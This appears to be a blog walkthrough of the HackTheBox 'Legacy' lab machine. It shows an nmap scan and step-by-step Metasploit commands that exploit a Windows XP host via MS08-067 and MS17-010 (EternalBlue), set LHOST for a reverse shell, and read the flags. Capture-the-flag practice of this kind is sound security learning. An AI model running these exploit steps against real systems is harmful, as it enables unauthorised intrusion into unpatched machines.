data:image/s3,"s3://crabby-images/6ca87/6ca87bbe3158a084e703213211585d9f7111a7d2" alt="hackthebox Legacy"
I know this is an oldy but I’m learning here and I wanted to know more about Metasploit. I have found 2 Exploits for this Legacy machine on hackthebox and going to explain both of them. I’m using Metasploit to exploit this machine.
Using Exploit 1 on Legacy
Start an nmap scan
Nmap -T4 -A -p- 10.10.10.4
data:image/s3,"s3://crabby-images/26532/265322318ddf666191a8aeace9c136061253736a" alt="hackthebox Legacy with metasploit"
We see port 445 is open and we see a windows XP machine. With a bit of googling you will come across MS08-067
data:image/s3,"s3://crabby-images/c15be/c15bedb255d77ecd163ae282e1d9142b9779f2d6" alt="google"
This is from rapid7 so this is probably in Metasploit
Start up Metasploit by typing
msfconsole
search MS0867
data:image/s3,"s3://crabby-images/30ea0/30ea0d8b3786bb58c4c47052958cb4e8b8284582" alt="hackthebox Legacy with metasploit"
Type use 0
Options
Fill in all te requirements (RHOST and LHOST)
data:image/s3,"s3://crabby-images/92f6c/92f6cb02a467a3b7ac542475ce674a878e161345" alt="metasploit"
set RHOST 10.10.10.4
set LHOST <YOUR MACHINE IP>
If all is filled in type
RUN
data:image/s3,"s3://crabby-images/5e726/5e7268ad77e9e60aa60503589ca5e82d462d578e" alt="hackthebox Legacy with metasploit"
Now you can navigate to the users desktop and administrators desktop to get the flags for user and root. Remember this is a windows machine so use type flag.txt to output the content of a file to the screen
Using Exploit 2
It is a legacy system and there for probably vulnerable to the ethernal blue MS17-010
Open the msfconsole by typing msfconsole in the terminal
Type in
search MS17-010
data:image/s3,"s3://crabby-images/17b06/17b0623121233f9dee0203fded6f9524e3579227" alt="hackthebox Legacy with metasploit"
For most of them we need the host to be x64 except the psexec one. Type in
use 4
options
set RHOST 10.10.10.4
set LHOST <YOUR MACHINE IP>
data:image/s3,"s3://crabby-images/dadd7/dadd7b79e2672b29bcc780efb8f1ef99a48f9761" alt="metasploit"
As you see I needed to run it a couple of times to get the shell. If you do not get a shell then reset the box. It should popup in a coupe of tries
This conclude hackthebox Legacy with metasploit . Now we all know how important it is to update your operating systems. This more or less confirms it.